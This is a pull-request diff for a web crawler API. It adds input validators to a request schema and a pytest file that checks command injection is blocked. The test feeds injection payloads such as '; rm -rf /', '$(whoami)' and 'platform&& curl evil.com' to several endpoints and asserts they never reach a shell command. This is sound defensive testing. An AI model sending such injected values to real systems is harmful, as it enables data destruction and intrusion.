Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
17 changes: 16 additions & 1 deletion api/schemas/crawler.py
Original file line number Diff line number Diff line change
Expand Up @@ -16,9 +16,10 @@
# 详细许可条款请参阅项目根目录下的LICENSE文件。
# 使用本代码即表示您同意遵守上述原则和LICENSE中的所有条款。

import re
from enum import Enum
from typing import Optional, Literal
from pydantic import BaseModel, Field
from pydantic import BaseModel, Field, field_validator


MAX_API_LIMIT_COUNT = 10000
Expand Down Expand Up @@ -74,6 +75,20 @@ class CrawlerStartRequest(BaseModel):
save_option: SaveDataOptionEnum = SaveDataOptionEnum.JSONL
cookies: str = ""
headless: bool = False

@field_validator("specified_ids", "creator_ids")
@classmethod
def validate_ids(cls, v: str) -> str:
if v and not re.fullmatch(r"[A-Za-z0-9_,\- ]*", v):
raise ValueError("IDs must only contain alphanumeric characters, commas, hyphens, underscores, or spaces")
return v

@field_validator("keywords", "cookies")
@classmethod
def validate_no_control_chars(cls, v: str) -> str:
if v and re.search(r"[\x00\n\r]", v):
raise ValueError("Field must not contain null bytes or newline characters")
return v
max_notes_count: Optional[int] = Field(default=None, ge=1, le=MAX_API_LIMIT_COUNT)
max_comments_count: Optional[int] = Field(default=None, ge=1, le=MAX_API_LIMIT_COUNT)

Expand Down
70 changes: 70 additions & 0 deletions tests/test_invariant_main.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,70 @@
import pytest
from unittest.mock import patch, MagicMock
import subprocess


PAYLOADS = [
"; rm -rf /",
"$(whoami)",
"`id`",
"platform&& curl evil.com",
"valid_platform",
]


@pytest.mark.parametrize("payload", PAYLOADS)
def test_shell_commands_never_include_unsanitized_input(payload):
"""Invariant: Shell commands never include unsanitized user input"""
captured_calls = []

original_run = subprocess.run
original_popen = subprocess.Popen

def mock_run(*args, **kwargs):
captured_calls.append(("run", args, kwargs))
return MagicMock(returncode=0)

def mock_popen(*args, **kwargs):
captured_calls.append(("popen", args, kwargs))
mock_proc = MagicMock()
mock_proc.returncode = 0
mock_proc.communicate.return_value = (b"", b"")
mock_proc.poll.return_value = 0
return mock_proc

with patch("subprocess.run", side_effect=mock_run), \
patch("subprocess.Popen", side_effect=mock_popen):
try:
from api.main import app
from fastapi.testclient import TestClient
client = TestClient(app)

# Try various endpoints that might accept platform/config input
client.post("/crawl", json={"platform": payload})
client.post("/api/crawl", json={"platform": payload})
client.get(f"/crawl/{payload}")
client.post("/start", json={"platform": payload, "config": payload})
except Exception:
pass

shell_metacharacters = [";", "&&", "||", "`", "$(", "|", ">", "<"]
for call_type, args, kwargs in captured_calls:
# If shell=True is used, the command must not contain unsanitized payload
if kwargs.get("shell", False):
cmd = args[0] if args else kwargs.get("args", "")
if isinstance(cmd, str) and payload != "valid_platform":
for meta in shell_metacharacters:
if meta in payload:
assert payload not in cmd, (
f"Unsanitized payload '{payload}' found in shell command: {cmd}"
)
# If args are passed as a list, verify no element contains raw shell metacharacters from payload
if args and isinstance(args[0], (list, tuple)):
cmd_parts = args[0]
joined = " ".join(str(p) for p in cmd_parts)
if payload != "valid_platform":
for meta in shell_metacharacters:
if meta in payload:
assert payload not in joined, (
f"Unsanitized payload '{payload}' found in command args: {cmd_parts}"
)